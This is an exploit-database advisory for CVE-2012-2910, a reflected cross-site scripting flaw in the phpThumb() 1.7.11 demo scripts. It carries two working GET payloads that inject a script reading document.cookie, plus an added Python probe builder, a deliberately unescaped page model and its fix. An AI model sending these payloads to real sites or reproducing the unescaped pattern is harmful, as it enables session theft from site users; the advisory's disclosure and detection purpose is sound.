SiliSoftware phpThumb 1.7.11-201108081537 demo/phpThumb.demo.showpic.php title Parameter XSS
2012-05-16T00:00:00
ID EDB-ID:37206 Type exploitdb Reporter Gjoko Krstic Modified 2012-05-16T00:00:00
Description
SiliSoftware phpThumb() 1.7.11-201108081537 demo/phpThumb.demo.showpic.php title Parameter XSS. CVE-2012-2910. Webapps exploit for php platform
source: http://www.securityfocus.com/bid/53572/info
phpThumb() is prone to multiple cross-site scripting vulnerabilities because its bundled demo scripts echo query-string parameters back into the page without HTML-encoding them. The vector shown here is reflected XSS: the title parameter of demo/phpThumb.demo.showpic.php is written into the HTML output as-is, so a value beginning with "> closes the surrounding attribute and tag and the remainder is parsed as markup.
An attacker who can get a victim to open a crafted link may execute arbitrary script in the victim's browser in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials (unless the session cookie is marked HttpOnly) and to launch other attacks against the site on the victim's behalf.
phpThumb() 1.7.11-201108081537 is vulnerable; other versions may also be affected. The demo scripts are sample pages, not part of the thumbnail-generation path, so removing or blocking the demo/ directory on a deployed install closes this vector without affecting phpThumb itself.
GET [SOME_CMS]/phpthumb/demo/phpThumb.demo.showpic.php?title="><script>alert(document.cookie);</script> HTTP/1.1
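The following is an added example, not code from the advisory or from phpThumb's own source. It builds the probe request from the GET line above, shows a constructed stand-in for a page that drops a parameter into an HTML attribute unescaped next to the corrected version (the equivalent of htmlspecialchars($t, ENT_QUOTES) in PHP), and checks for reflection the way a practitioner should: by parsing the response and confirming that the probe introduces a <script> element a benign value does not, rather than grepping for the payload string. The render_* functions model the vulnerable pattern only; they are not phpThumb.demo.showpic.php, and the base URL is a placeholder for [SOME_CMS]/phpthumb.

```python
"""Reflected-XSS probe check for the phpThumb demo-script vector (added example)."""
import html
from html.parser import HTMLParser
from urllib.parse import urlencode

# Probe taken verbatim from the advisory's GET line.
PROBE = '"><script>alert(document.cookie);</script>'
# Harmless value used as the baseline for the comparison.
BENIGN = "phpThumb demo"


def build_probe_url(base_url, script="phpThumb.demo.showpic.php", param="title", payload=PROBE):
    """Assemble the advisory's request. base_url stands in for [SOME_CMS]/phpthumb (assumption).

    The same helper covers the sibling vector from CVE-2012-2910 by passing
    script="phpThumb.demo.random.php", param="dir".
    """
    return f"{base_url}/demo/{script}?{urlencode({param: payload})}"


def render_vulnerable(title):
    """Constructed stand-in for a page that echoes the parameter into an attribute unescaped."""
    return f'<html><body><img src="phpThumb.php?src=demo.jpg" title="{title}"></body></html>'


def render_fixed(title):
    """Same page with the value encoded for an attribute context (quote=True also encodes the double quote)."""
    safe = html.escape(title, quote=True)
    return f'<html><body><img src="phpThumb.php?src=demo.jpg" title="{safe}"></body></html>'


class _ScriptCounter(HTMLParser):
    """Counts <script> start tags as an HTML tokenizer sees them, not as a substring match."""

    def __init__(self):
        super().__init__()
        self.scripts = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts += 1


def script_tags(body):
    """Number of <script> elements in an HTML response body."""
    parser = _ScriptCounter()
    parser.feed(body)
    parser.close()
    return parser.scripts


def is_reflected_xss(render, payload=PROBE):
    """True if the probe yields more <script> elements than a benign value on the same page.

    Comparing against a baseline avoids flagging pages that legitimately ship their own scripts;
    the payload being present as text (e.g. entity-encoded) is not enough to count as a finding.
    """
    return script_tags(render(payload)) > script_tags(render(BENIGN))


if __name__ == "__main__":
    print(build_probe_url("http://target.example/phpthumb"))
    print("vulnerable page reflects script:", is_reflected_xss(render_vulnerable))
    print("fixed page reflects script:", is_reflected_xss(render_fixed))
```

In a live check, replace the render callables with a function that fetches the built URL and returns the response body; the baseline request with BENIGN is what separates a true reflection from a page that merely contains the word "script". The fix side of the example is attribute-context encoding at the point of output; input "sanitizing" alone does not address the problem.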
CVSS 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
OSVDB 82295
Exploit-DB https://www.exploit-db.com/exploits/37206/
CVE CVE-2012-2910 (NVD, published 2012-05-21): Multiple cross-site scripting (XSS) vulnerabilities in SiliSoftware phpThumb() 1.7.11 allow remote attackers to inject arbitrary web script or HTML via the (1) dir parameter to demo/phpThumb.demo.random.php or (2) title parameter to demo/phpThumb.demo.showpic.php. https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2910
Related EDB-ID:37207, same reporter and date, covers the other vector of CVE-2012-2910, the dir parameter of demo/phpThumb.demo.random.php: https://www.exploit-db.com/exploits/37207/
GET [SOME_CMS]/phpthumb/demo/phpThumb.demo.random.php?dir="><script>alert(document.cookie);</script> HTTP/1.1